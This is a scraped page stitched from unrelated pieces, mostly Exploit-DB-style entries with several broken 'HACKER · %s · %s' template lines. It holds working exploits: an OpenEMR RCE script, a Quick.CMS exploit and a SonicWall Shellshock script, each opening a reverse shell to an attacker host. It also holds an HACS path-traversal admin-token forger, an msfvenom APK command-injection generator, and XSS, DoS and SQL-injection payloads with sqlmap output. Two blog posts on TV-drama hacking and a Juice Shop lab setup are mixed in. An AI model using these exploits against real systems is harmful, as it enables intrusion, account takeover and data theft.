# Exploit Title: MyBB Delete Account Plugin 1.4 - Cross-Site Scripting # Date: 1/25/2021 # Author: 0xB9 # Twitter: @0xB9Sec # Contact: 0xB9[at]pm.me # Software Link: https://github.com/vintagedaddyo/MyBB_Plugin-Delete_Account/ # Version: 1.4 # Tested on: Windows 10 1. Description: This plugin allows users to delete their account. Giving a reason for deleting your account is vulnerable to XSS. 2. Proof of Concept: - Go to User CP -> Delete Account - Input a payload for delete account reason <script>alert('XSS')</script> Payload will execute here.. admin/index.php?module=user-deleteaccount
HireHackking

OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)

HACKER · %s · %s

# Title: OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2) # Exploit Author: Alexandre ZANNI # Date: 2020-07-16 # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz # Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile # Version: < 5.0.1 (Patch 4) # Tested on: Ubuntu 18.04, OpenEMR Version 5.0.1.3 # References: https://www.exploit-db.com/exploits/48515 #!/usr/bin/env ruby require 'httpclient' require 'docopt' shell_name = 'shell4.php' user = 'openemr_admin' password = 'xxxxxx' payload = 'php/reverse_php' lhost = '10.10.15.201' lport = 8888 doc = <<~DOCOPT OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution Usage: #{__FILE__} manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug] #{__FILE__} semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug] #{__FILE__} auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug] #{__FILE__} -H | --help Options: -r <url>, --root-url <url> Root URL (base path) including HTTP scheme, port and root folder -s <filename>, --shell <filename> Filename of the PHP reverse shell payload -u <username>, --user <username> Username of the admin -p <password>, --password <password> Password of the admin -m <payload>, --payload <payload> Metasploit PHP payload -h <host>, --lhost <host> Reverse shell local host -t <port>, --lport <port> Reverse shell local port --debug Display arguments -H, --help Show this screen Examples: #{__FILE__} manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123 #{__FILE__} semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888 #{__FILE__} auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999 DOCOPT begin args = Docopt.docopt(doc) pp args if args['--debug'] if args['manual'] shell_name = File.basename(args['--shell']) shell_path = args['--shell'] else shell_name = "tmp#{rand(1000)}.php" shell_path = shell_name end if args['semi-auto'] payload = args['--payload'] else payload = 'php/reverse_php' end # Authentication data uri_1 = URI("#{args['--root-url']}/interface/main/main_screen.php?auth=login&site=default") data_1= { 'new_login_session_management' => '1', 'authProvider' => 'Default', 'authUser' => args['--user'], 'clearPass' => args['--password'], 'languageChoice' => '1' } # Reverse shell data unless args['manual'] puts "[+] Generating the reverse shell payload: #{shell_name}" %x(msfvenom -p #{payload} LHOST=#{args['--lhost']} LPORT=#{args['--lport']} -f raw > #{shell_name}) end data_2 = { 'site' => 'default', 'mode' => 'save', 'docid' => shell_name, 'content' => File.read(shell_path)} uri_2 = URI("#{args['--root-url']}/portal/import_template.php?site=default") uri_3 = URI("#{args['--root-url']}/portal/#{shell_name}") clnt = HTTPClient.new puts '[+] Authenticating' clnt.post(uri_1, data_1) puts '[+] Uploading the reverse shell' clnt.post(uri_2, data_2) puts "[+] Executing the reverse shell: #{args['--root-url']}/portal/#{shell_name}" clnt.get(uri_3) rescue Docopt::Exit => e puts e.message end
HireHackking

Title《你安全吗》 Interpretation of the technical aspects

HACKER · %s · %s

This article only analyzes the technologies involved in film and television dramas, and does not explain the plot in detail. If you are interested, you can check it out. PS: Technical analysis is carried out in the plot order (1~4) episodes
At the beginning of the TV, I showed me the first attack technology, a malicious power bank. It seems that I use a power bank to charge my phone, but during the charging process, I have obtained user information.http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/1_20220915125414.png
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/2_20220915125944.png
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/3_20220915130038.png
Implementation principle This method involves 《利用树莓派监控女盆友手机》 in my previous article. It is actually very simple. It is to use the adb command to obtain the information of the phone. Of course, you can also use the adb command to install the shell.
It is easy to implement, just turn on the mobile phone developers to choose first.
But in reality, the phone developer option is turned off by default. It will not be possible in the case of television.
Information Collection

Collect information based on WeChat Moments
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/4_20220915130543.png
Ten things you can see from non-friends in the circle of friends. Check the latest updates in the circle of friends and get relevant information from the other party. In addition, it was speculated that the heroine's husband was in a cheating situation.
My cousin suggests that it is not necessary for work, so try to turn off this function in WeChat.
Information collection based on WeChat steps
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/5_20220915131352.png
Through the WeChat steps, can you get what you are doing now? If you just woke up at 8 o'clock in the morning and your friend's steps have reached 5,000 steps, it means that he is very likely to be running and exercising.
Information collection based on phishing links
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/6_20220915131541.png
I have also written similar articles in my cousin's previous article. Through the probe, you can simply obtain the target's IP address, GPS information, photos, recordings, etc. However, as the security performance of the mobile phone improves, there will be pop-up prompts.
Using Baidu Netdisk to backup data
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/7_20220915131932.png
This is often encountered in life. Moreover, after installing Baidu Netdisk, backup address book and other information is enabled by default. You can give it a try! (It is best to replace the avatar too, so that it will be true)
Use Didi to share your itinerary
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/8_20220915132245.png
Through the above plan, the protagonist successfully obtained the other party’s mobile phone number and found the relevant account through WeChat.
Of course, the computer of the network security expert was poisoned.http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/11_20220915132907.png
Cracking the driver's letter
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/14_20220915134645.png
Of course, the director gave the password here. If it were the complexity of the password in reality, it would probably not be successfully cracked when the drama ended.
Control the Internet cafe network
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/15_20220915140409.png
This should be managed using operation and maintenance apps or mini programs. Not very difficult.
Applications of Social Engineering
Get useful information from the other party by picking up garbage. Therefore, in daily life, if orders such as express delivery and takeaway are not processed, they will cause certain information leakage.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/16_20220915141013.png
Through the other party’s account information, enumerate other account information, such as Tieba, Weibo, QQ space, to obtain the other party’s relevant personal information.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/17_20220915141642.png
WiFi Probe
Long before, CCTV 315 exposed cases of WiFi probe stealing user information. The principle is that when the user's mobile phone wireless LAN is turned on, a signal will be sent to the surrounding areas to find the wireless network. Once the probe box discovers this signal, it can quickly identify the user's mobile phone's MAC address, convert it into an IMEI number, and then convert it into a mobile phone number.
Therefore, some companies place this small box in shopping malls, supermarkets, convenience stores, office buildings, etc. and collect personal information without the user's knowledge, even big data personal information such as marriage, education level, and income.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/18_20220915150519.png
android shell
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/21_20220915151414.png
As can be seen from the video, the very basic msf controls android commands. But it is a bit exaggerated to be able to directly manipulate mobile phone editing.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/22_20220915151649.png
wifi fishing
Use fluxion for WiFi fishing.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/23_20220915154038.png
PS (4-8) episodes, only analyze the technology in film and television dramas, and the plot and characters are not explained.
Then, in order to obtain data from the fraud group, I sneaked to the computer room to download the server data.http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/1_20220916135536.gif
The software used here should use XFTP. This is also a physical attack!
Physical Attack
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/R-C_20220916160749.jpg
The so-called physical attack means that an attacker cannot find relevant vulnerabilities at the software level or system. If you cannot win the target for the time being, you will go to the field for investigation and sneak into the target through social engineering and other methods to attack. This kind of attack is the most deadly.http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/2_20220916141442.gif
Tools used in the network security competition. In the previous shot, it should be to use Owasp to scan the target website for vulnerabilities. To be honest, the page has not moved, I don’t know what I have scanned!http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/111_20220916142109.png
After entering the second level of protection, the third game should still be the msf interface. Set the msf configuration parameters, but there has been no exploit and I don't know what to wait for.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/123_20220916142440.png
When the countdown is three minutes, SQLmap injection should have started.http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/145_20220916142633.png
As can be seen from the video, the command used is
The use of sqlmap -r 1.txt --batch --level 5 -v current-usersqlmap has been mentioned more in previous articles. The above command should be used to obtain the current system user through post injection.
Parameter interpretation: -r 1.txt The target request data is stored in txt. Generally, burp is used to capture packets and save them as txt.
-- The user does not need to enter YES or NO during the execution process, and the default value YES prompted by sqlmap will be used to run continuously.
--level risk level, default is 1. When level is 5, many payloads will be tested, and the efficiency will be reduced.
–current-user Gets the current username.
Summary
The network security tools involved in TV series are all common network security knowledge we usually have. The film and television dramas have expanded slightly, but from the perspective of the plot, it is still very good. Especially while popularizing network security knowledge to the public, it closely links topics related to the people such as online water army, online fraud, pig killing, online loans, etc. At the end of the video, some network security knowledge will be popularized to everyone, which is worth recommending!
HireHackking

jQuery UI 1.12.1 - Denial of Service (DoS)

HACKER · %s · %s

# Exploit Title: jQuery UI 1.12.1 - Denial of Service (DoS) # Date: 20 Jan, 2021 # Exploit Author: Rafael Cintra Lopes # Vendor Homepage: https://jqueryui.com/ # Software Link: https://jqueryui.com/download/ # Version: <= 1.12.1 # CVE : CVE-2020-28488 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>DoS - jQuery UI 1.12.1</title> </head> <body> <h2>DoS - jQuery UI 1.12.1</h2> <div> <button onclick="exploit()">Exploit</button> </div> <p>PoC by Rafael Cintra Lopes</p> <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script> <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script> <script> function exploit(){ for (var i = 0; i < 10; i++) { $("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'}); } } </script> </body> </html>
HireHackking
# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection # Exploit Author: Justin Steven # Vendor Homepage: https://www.metasploit.com/ # Software Link: https://www.metasploit.com/ # Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0 # CVE : CVE-2020-7384 #!/usr/bin/env python3 import subprocess import tempfile import os from base64 import b64encode # Change me payload = 'echo "Code execution as $(id)" > /tmp/win' # b64encode to avoid badchars (keytool is picky) payload_b64 = b64encode(payload.encode()).decode() dname = f"CN='|echo {payload_b64} | base64 -d | sh #" print(f"[+] Manufacturing evil apkfile") print(f"Payload: {payload}") print(f"-dname: {dname}") print() tmpdir = tempfile.mkdtemp() apk_file = os.path.join(tmpdir, "evil.apk") empty_file = os.path.join(tmpdir, "empty") keystore_file = os.path.join(tmpdir, "signing.keystore") storepass = keypass = "password" key_alias = "signing.key" # Touch empty_file open(empty_file, "w").close() # Create apk_file subprocess.check_call(["zip", "-j", apk_file, empty_file]) # Generate signing key with malicious -dname subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass, "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname]) # Sign APK using our malicious dname subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file, "-storepass", storepass, "-keypass", keypass, apk_file, key_alias]) print() print(f"[+] Done! apkfile is at {apk_file}") print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")
HireHackking

Quick.CMS 6.7 - Remote Code Execution (Authenticated)

HACKER · %s · %s

# Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated) # Date: 2020-12-28 # Exploit Author: mari0x00 # Vendor Homepage: https://opensolution.org/ # Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip # Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/ # Version: <= 6.7 # CVE : CVE-2020-35754 #!/usr/bin/python3 import requests import sys from termcolor import colored from time import sleep print(colored('''###########################################################''',"red")) print(colored('''###### Quick.CMS authenticated RCE by mari0x00 #######''',"red")) print(colored('''###########################################################''',"red")) print("") if len(sys.argv) != 6: print((colored("[~] Usage : python3 quickpwn.py <url> <username> <password> <IP> <PORT>","red"))) print((colored("[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ john@example.com pass123 192.168.101.101 4444","red"))) exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] IP = sys.argv[4] PORT = sys.argv[5] #Start session s = requests.Session() headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'} #Authenticate print((colored("[+] Attempting user login","blue"))) login_data = { "sEmail": username, "sPass": password, "bAcceptLicense": "1", "iAcceptLicense": "true" } login = s.post(url+"admin.php?p=login", login_data, headers=headers) sleep(0.5) #Exploit print((colored("[+] Adding shell command","blue"))) payload = "Back end\\\"; system('/bin/bash -c \\'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1\\''); //" shell = { "sOption": "save", "Back_end_only": payload } exploit = s.post(url+"admin.php?p=languages&sLangEdit=en", shell, headers=headers) sleep(1) #Triggering reverse shell (three times just in case) print("") print((colored("[+] Triggering the shell. Go nuts!","green"))) r = s.get(url+"admin.php?p=languages", headers=headers) sleep(1) r = s.get(url+"admin.php?p=languages", headers=headers) sleep(1) r = s.get(url+"admin.php?p=languages", headers=headers)
HireHackking
# Exploit Title: Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover # Date: 2021-01-28 # Exploit Author: Lyghtnox # Vendor Homepage: https://www.home-assistant.io/ # Software Link: https://github.com/hacs/integration # Version: < 1.10.0 # Tested on: Raspbian + Home Assistant 2021.1.0 # Blog post: https://lyghtnox.gitlab.io/posts/hacs-exploit/ # STEP 1: Run the exploit (python3 exploit.py host port) # STEP 2: Copy the token printed and set in your browser's local storage with # the key `hassTokens` import requests import jwt import json import argparse class HA: def __init__(self, ip, port): self.ip = ip self.port = port def retrieveFile(self, f): url = f'http://{self.ip}:{self.port}/hacsfiles/../../{f}' with requests.Session() as s: r = requests.Request(method='GET', url=url) prep = r.prepare() prep.url = url try: r = s.send(prep, verify=False) except requests.exceptions.ConnectionError: return if r.status_code == 400 or r.status_code == 404: return return r def craftToken(self): f = self.retrieveFile('.storage/auth').json() # Find owner for user in f['data']['users']: if user['is_owner']: self.owner = user['id'] break else: print("No owner found. Using first account") self.owner = f['data']['users'][0]['id'] for token in f['data']['refresh_tokens']: if self.owner == token['user_id']: encoded_jwt = jwt.encode({'iss': token['id']}, token['jwt_key'], algorithm="HS256") self.token = {'access_token': encoded_jwt, 'token_type': 'Bearer', 'refresh_token': token['token'], 'expires_in': 1800, 'hassUrl': f"http://{self.ip}:{self.port}", 'clientId': token['client_id']} return self.token if __name__ == "__main__": parser = argparse.ArgumentParser(description="Exploit a vulnerability in \ HACS < 1.10.0 to gain admin access to an Home Assistant instance.") parser.add_argument("host", type=str, help="IP of the HASS instance") parser.add_argument("port", type=int, help="port of the HASS instance") args = parser.parse_args() r = requests.get('http://{ip}:{port}/hacsfiles/iconset.js'.format( ip=args.host, port=args.port)) if r.status_code != 404: print("HACS found! Testing vulnerability...", end='', flush=True) ha = HA(args.host, args.port) if ha.retrieveFile('configuration.yaml'): print(": VULNERABLE") token = ha.craftToken() if token: print(f"Use the following 'hassTokens': {json.dumps(token)}") else: print("Unable to craft token") else: print(": Not vulnerable")
HireHackking

Title: Kali installs Owasp juice shop (I)

HACKER · %s · %s

This vulnerability range was developed by Owasp and contains the top ten vulnerabilities of Owasp, with a total of 47 levels, and the difficulty varies. Owasp juice shop can also be understood as a hacker game! This article mainly tells you about the deployment of the Owasp juice shop environment.
Environment
kali2022docker
What is docker
Docker is an open source application container engine based on the Go language and is open sourced according to the Apache2.0 protocol. Docker allows developers to package their applications and dependencies into a lightweight, portable container and publish them to any popular Linux machine, or virtualize them. Containers use sandboxing mechanism completely, and there will be no interface between them (similar to iPhone apps). More importantly, the container performance overhead is extremely low. The system resources are relatively low.
Installing docker
Installing docker in kali is very simple. We only need to execute the following commands.
apt-get update
apt-get install docker
Use docker to install owap juice shop
Execute the following command:
docker pull bkimminich/juice-shop uses docker to pull the owasp image and run it directly in docker. This directly omits the deployment of the environment!
Run
docker run -d -p 3000:3000 bkimminich/juice-shop At this time, we only need to access kaliip:3000 in the browser.
The slight test
As a ancestral grandfather, I was confused when I opened the owasp juice shop. What the hell is this? I can't understand this shooting range. By reviewing the elements, we see the following code
Can
I saw a page with a scoreboard with the link #score-board. We visit this page.
From then on, I started the first step to becoming a big Heikuo!
HireHackking
# Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated) # Exploit Author: Darren Martyn # Vendor Homepage: https://www.home-assistant.io/ # Version: < SMA 8.0.0.4 # Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ #!/usr/bin/python # coding: utf-8 # Author: Darren Martyn # Credit: Phineas Fisher # Notes: # This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team # and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command # execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns # a trivial reverse shell using /dev/tcp. # There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but # implementing that is left as an exercise for the reader. I've seen a few approaches, and # would be interested in seeing yours. # There is another LPE that works only on some models which I also have removed from this. # Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ import requests import sys import telnetlib import socket from threading import Thread from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) import time def banner(): print """ 88 88 "" 88 88 8b d8 88 ,adPPYba, 88 88 ,adPPYYba, 88 `8b d8' 88 I8[ "" 88 88 "" `Y8 88 `8b d8' 88 `"Y8ba, 88 88 ,adPPPPP88 88 `8b,d8' 88 aa ]8I "8a, ,a88 88, ,88 88 "8" 88 `"YbbdP"' `"YbbdP'Y8 `"8bbdP"Y8 88 88 88 88 ,adPPYb,88 ,adPPYba, ,adPPYba, 8b,dPPYba, a8" `Y88 a8" "8a a8" "8a 88P' "Y8 8b 88 8b d8 8b d8 88 "8a, ,d88 "8a, ,a8" "8a, ,a8" 88 `"8bbdP"Y8 `"YbbdP"' `"YbbdP"' 88 SonicWall SSL-VPN Appliance Remote Exploit Public Release (Jan 2021). Author: Darren Martyn. Credit goes to Phineas Fisher for this. Stay inside, do crimes. """ def handler(lp): # handler borrowed from Stephen Seeley. print "(+) starting handler on port %d" %(lp) t = telnetlib.Telnet() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", lp)) s.listen(1) conn, addr = s.accept() print "(+) connection from %s" %(addr[0]) t.sock = conn print "(+) pop thy shell!" t.interact() def execute_command(target, command): url = target + "/cgi-bin/jarrewrite.sh" headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)} r = requests.get(url=url, headers=headers, verify=False) return r.text def check_exploitable(target): print "(+) Testing %s for pwnability..." %(target) output = execute_command(target=target, command="cat /etc/passwd") if "root:" in output: print "(*) We can continue, time to wreck this shit." return True else: return False def pop_reverse_shell(target, cb_host, cb_port): print "(+) Sending callback to %s:%s" %(cb_host, cb_port) backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port) execute_command(target=target, command=backconnect) def hack_the_planet(target, cb_host, cb_port): if check_exploitable(target) == True: pass else: sys.exit("(-) Target not exploitable...") handlerthr = Thread(target=handler, args=(int(cb_port),)) handlerthr.start() pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port) def main(args): banner() if len(args) != 4: sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0])) hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3]) if __name__ == "__main__": main(args=sys.argv)
HireHackking

Zoo Management System 1.0 - 'anid' SQL Injection

HACKER · %s · %s

# Exploit Title: Zoo Management System 1.0 - 'anid' SQL Injection # Google Dork: N/A # Date: 29/1/2021 # Exploit Author: Zeyad Azima # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/ # Version: V1 # Tested on: Windows # Identify the vulnerability 1- go to http://localhost/animals.php and click on an animal 2- then add the following payload to the url payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh url: http://localhost/animal-detail.php?anid=1%20anid=9%27%20AND%20(SELECT%208432%20FROM%20(SELECT(SLEEP(5)))lMym)%20AND%20%27jMXh%27=%27jMXh If the web server makes you wait 5 seconds then it's vulnerable # Exploit Now you can exploit it using sqlmap command: sqlmap -u url --dbs example: sqlmap -u http://localhost/zms/animal-detail.php?anid=1 --dbs ___ __H__ ___ ___[.]_____ ___ ___ {1.4.10.16#dev} |_ -| . [.] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 23:05:33 /2021-01-29/ [23:05:34] [INFO] resuming back-end DBMS 'mysql' [23:05:34] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ban6c541hos...n856fi447q'). Do you want to use those [Y/n] y sqlmap resumed the following injection point(s) from stored session: --- Parameter: anid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: anid=9' AND 1925=1925 AND 'JrZo'='JrZo Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: anid=9' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6b6271,0x5262686e75537a58716e565153775775796b547a4c56616b42647045536274444c6f6b585a654476,0x716a627171),NULL,NULL,NULL,NULL-- - --- [23:05:36] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.41, PHP 7.3.10, PHP back-end DBMS: MySQL >= 5.0.12 [23:05:36] [INFO] fetching database names available databases [6]: [*] information_schema [*] mysql [*] performance_schema [*] sys [*] umspsdb [*] zmsdb [23:05:36] [INFO] fetched data logged to text files under